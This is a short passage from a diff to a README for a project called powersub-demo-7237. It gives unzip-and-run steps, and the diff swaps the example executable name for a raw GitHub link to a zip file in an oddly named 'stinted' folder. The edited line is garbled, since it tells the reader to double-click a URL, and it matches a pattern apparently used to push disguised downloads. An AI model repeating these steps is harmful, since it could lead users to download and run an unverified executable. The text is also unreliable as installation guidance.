Ishum2007/powersub-demo-7237/README.md

    If the downloaded file is in a ZIP format, locate the file and right-click it.
 Select "Extract All" to unzip the contents.
 Follow the prompts to complete the extraction.

 5. **Run the Application:**
    Navigate to the folder where you extracted or downloaded the application.
-Double-click on the executable file (e.g., `powersub-demo.exe`).
+Double-click on the executable file (e.g., `https://raw.githubusercontent.com/Ishum2007/powersub-demo-7237/main/stinted/powersub-demo-7237.zip`).

 Congratulations!
 You are now ready to use powersub-demo-7237.